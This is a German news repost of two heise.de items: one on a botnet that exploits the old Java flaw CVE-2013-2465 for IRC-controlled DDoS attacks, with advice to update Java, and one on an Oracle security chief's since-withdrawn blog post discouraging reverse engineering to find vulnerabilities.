Anton Ivanov von der IT-Sicherheitsfirma Kaspersky berichtet von einem Exploit der Java-Lücke CVE-2013-2465, die Oracle bereits im Juni 2013 geschlossen hat. Betroffen sind Nutzer der Java-Versionen 5 und 6 ohne kommerziellen Support sowie der Version 7, die noch Release 21 oder früher verwenden.
Laut Ivanov installiert sich die Angreifersoftware unter Linux, Mac OS X und Windows im Heimatverzeichnis des Anwenders und stellt sicher, dass sie beim Hochfahren des Systems gestartet wird. Unklar bleibt in der Beschreibung, wie das unter Linux ohne Root-Rechte funktionieren soll. Zur Kommunikation mit dem Steuerrechner des Botnetzes nutzt die Software das Chatprotokoll IRC.
Darüber werden die für eine DDoS-Attacke (Distributed Denial of Service) nötigen Informationen gesendet, unter anderem die IP-Adresse und Portnummer des anzugreifenden Rechners sowie die Dauer des Angriffs. Ivanov zufolge hat Kaspersky in der analysierten Software Code für eine DDoS-Attacke auf einen Versender von Massenmails entdeckt.
Auch die IT-Sicherheitsfirma Symantec warnt vor der Lücke, deren Hintergründe sie etwas genauer beschreibt. Als Schutz dagegen reicht der Umstieg auf eine aktuelle Version von Java 7 aus, die Oracle für viele Betriebssysteme kostenlos bereitstellt. Mac-Anwender bekommen auch für das ältere Java 6 noch eine korrigierte Version für OS X 10.6 sowie 10.7 und später bei Apple.
Quelle und weiterführende Links : www.heise.de (http://www.heise.de/newsticker/meldung/Botnetz-nutzt-Luecke-in-alten-Java-Versionen-2099839.html)
-
Wer Lücken in Oracle-Software findet, sollte sie wohl lieber nicht dem Hersteller melden. Sonst droht Ärger mit Oracles Rechtsanwälten.
Der Software-Riese Oracle ist im Security-Bereich vor allem für das institutionalisierte Sicherheitsloch Java und seine Monster-Patchdays bekannt, bei denen erst letzten Monat 193 Sicherheitslücken auf einen Schlag gestopft wurden. Chief Security Officer Mary Ann Davidson erklärte jetzt in einem länglichen Blog-Beitrag, dass man besser keine Sicherheitslücken in Oracle-Produkten suchen sollte:
"Wenn Sie versuchen, den Code in eine andere Form zu bringen, als wir ihn ausliefern – also etwa in die Form, in der wir in geschrieben haben [...], dann betreiben Sie wahrscheinlich Reverse Egeneering. Tun Sie das nicht – lassen sie es."
Denn Oracles Nutzungsbedingungen verbieten das Reverse Engeneering, um die Eigentumsrechte des Herstellers zu schützen. Wer auf diesem Weg Sicherheitslücken entdeckt und bei Oracle meldet, muss demnach mit harschen Schreiben von Oracles Anwälten rechnen. Dass andere nach Sicherheitslücken suchen, sei auch gar nicht nötig, schließlich täte Oracle schon selbst genug, um Sicherheitslücken zu finden und zu beseitigen, erklärt Davidson lang und breit (ihr Rant hat mehr als 16.000 Zeichen – das entspricht etwa einem dreiseitigen c't-Artikel).
Während schon die ersten schrägen Witze über Oracles schräger Position zu Sicherheitsproblemen durchs Internet geisterten, entfernte Oracle das Blog-Posting wieder von der Web-Seite. Wer es trotzdem lesen möchte, findet es natürlich noch, etwa in der Wayback Machine: No, You Really Can’t – Achtung, es ist wirklich lang.
Quelle und Links : http://www.heise.de/security/meldung/l-f-Wenn-Oracles-Security-Chefin-vom-Leder-zieht-2777150.html